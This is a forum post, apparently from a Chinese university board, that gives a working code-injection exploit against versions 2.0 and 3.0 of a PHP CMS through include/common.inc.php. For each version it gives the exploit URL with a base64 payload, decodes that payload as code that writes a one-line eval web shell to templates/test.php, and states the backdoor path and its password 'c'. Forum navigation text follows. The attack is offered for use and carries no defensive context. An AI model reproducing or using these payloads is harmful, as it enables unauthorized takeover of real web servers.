|
|
2.0
+poc:
include/common.inc.php?$class2_all_1[0]=[base64_encode(eval php code)]
+Exploit:
/include/common.inc.php?$class2_all_1[0]=ZnB1dHMoZm9wZW4oJy4uL3RlbXBsYXRlcy90ZXN0LnBocCcsJ3crJyksJzw/cGhwIGV2YWwoJF9QT1NUW2NdKTs/PicpOw==
the encoded part is fputs(fopen(''../templates/test.php'',''w+''),''<?php eval($_POST[c]);?>'');
backdoor:http://site/templates/test.php password:c
-----------------------------------------------------------------------------------------
3.0
+POC:/include/common.inc.php?allclass[0]=[base64_encode(eval php code)]
+Exploit:
/include/common.inc.php?allclass[0]=ZnB1dHMoZm9wZW4oJy4uL3RlbXBsYXRlcy90ZXN0LnBocCcsJ3crJyksJzw/cGhwIGV2YWwoJF9QT1NUW2NdKTs/PicpOw==
the encoded part is fputs(fopen(''../templates/test.php'',''w+''),''<?php eval($_POST[c]);?>'');
backdoor:http://site/templates/test.php password:c |
|
晒晒我家乡的“夏花、秋枫、冬雪” 上集
大学毕业证+驾驶证=找工作更容易!经贸学车
916壁虎轮换社青秀山烧烤
:◢▇▇▇▇经贸学院音乐社所有传奇人物②
第五届校运会——开幕式
|版主考核中心|飞翔无限『经贸在线』
( 桂ICP备15001539号-2 ) 
IP卡
狗仔卡
发表于 2010-11-5 22:20:43
收藏
分享
淘帖
顶
踩
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
千斤顶
显身卡